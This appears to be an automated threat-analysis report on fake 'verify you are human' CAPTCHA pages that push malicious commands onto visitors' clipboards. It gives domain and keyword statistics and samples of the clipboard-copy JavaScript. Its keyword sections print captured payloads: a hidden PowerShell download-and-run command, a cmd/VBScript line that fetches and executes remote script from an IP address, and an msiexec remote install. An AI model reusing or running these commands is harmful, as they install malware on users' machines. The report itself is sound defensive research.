ClickGrab Threat Analysis Report - 2025-12-06
Generated on 2025-12-06 02:24:42
Executive Summary
- Total sites analyzed: 46
- Sites with malicious content: 13
- Unique domains encountered: 34
- Total URLs extracted: 160
- PowerShell download attempts: 1
- Clipboard manipulation instances: 76
Domain Analysis
Most Frequently Encountered Domains
- www.youtube.com: 35 occurrences
- www.google.com: 14 occurrences
- i.postimg.cc: 11 occurrences
- www.webgo.de: 10 occurrences
- icons.duckduckgo.com: 10 occurrences
- ${host}: 10 occurrences
- godprox.cc: 8 occurrences
- svetvip.ru: 8 occurrences
- api.whatsapp.com: 6 occurrences
- penguinpublishers.org: 6 occurrences
- t.me: 4 occurrences
- mc.yandex.ru: 4 occurrences
- shift-art.com: 4 occurrences
- use.fontawesome.com: 2 occurrences
- vk.com: 2 occurrences
URL Pattern Analysis
reCAPTCHA imagery
4 occurrences across 2 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)
Font resources
4 occurrences across 3 distinct URLs
https://use.fontawesome.com/releases/v5.0.0/css/all.css(2 times)https://fonts.googleapis.com(1 times)https://fonts.gstatic.com(1 times)
CDN hosted scripts
1 occurrences across 1 distinct URLs
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)
Google resources
20 occurrences across 9 distinct URLs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(10 times)https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://www.google.com/intl/en/policies/privacy/(1 times)https://www.google.com/intl/en/policies/terms/(1 times)- ...and 4 more distinct URLs
Suspicious Keyword Analysis
Total Keywords Found: 270 (34 unique)
Keyword Categories
Social Engineering
17 unique keywords
Verification Hashverificationverification_idRobotTo better prove you are not a robotVerify You Are Humanexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";command = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";Checking if you are humanI am not a robot- ...and 7 more
Obfuscation Indicators
2 unique keywords
command =cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\Downioads\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/meowingcybercat.mp3', $n);& $n;Remove-Item $n -Force;";cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/meowingcybercat.mp3', $n);& $n;Remove-Item $n -Force;";`
System Commands
7 unique keywords
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i03.27.i57.i4:5506/ig.vbs",0:h.Send:Execute h.ResponseText > "%temp%\ig.tmp" && wscript //E:VBScript "%temp%\ig.tmp";`const command =wscriptcommand =cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i03.27.i57.i4:5506/ig.vbs",0:h.Send:Execute h.ResponseText > "%temp%\ig.tmp" && wscript //E:VBScript "%temp%\ig.tmp";exec(cmd
Verification Text
3 unique keywords
hiddenray idHidden
Technical Terms
5 unique keywords
BypassRay IDfailed_to_retrieveiex.exe
Most Frequent Keywords
- failed_to_retrieve: 20 occurrences
- robot: 15 occurrences
- hidden: 15 occurrences
- CAPTCHA Verification: 13 occurrences
- I am not a robot: 13 occurrences
- Robot: 13 occurrences
- Verification: 13 occurrences
- verification: 13 occurrences
- verification-id: 13 occurrences
- To better prove you are not a robot: 13 occurrences
- Verification ID: 12 occurrences
- Ray ID: 11 occurrences
- Checking if you are human: 11 occurrences
- Verify you are human: 11 occurrences
- const command =: 11 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: CAPTCHA Verification, Verification, verification
Group 2: Verification Hash, verification-id, verification_id, Verification ID, verification id
Group 3: Robot, robot
Group 4: Hidden, hidden
Group 5: Verify You Are Human, Checking if you are human, Verify you are human
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
org/fiies/audio/meowingcybercat03002f08995c25cd9c7aef929d500b14com/i23/cioudfiare/verify/humanverfification/cioud...com/dist/web/assets/google063c8e90c10b6740bd0fe2c22efffbe8
Clipboard Manipulation Analysis
Detected clipboard manipulation in 76 instances.
Document.Execcommand Copy
Found in 40 snippets (52.6% of clipboard code)
Examples:
try { document.execCommand('copy')
document.execCommand("copy")
document.execCommand('copy')
Textarea Manipulation
Found in 40 snippets (52.6% of clipboard code)
Examples:
tListener("click", function () { const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
ng is the safe placeholder above const textarea = document.createElement('textarea'
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Report truncated for web display. Full data available in JSON.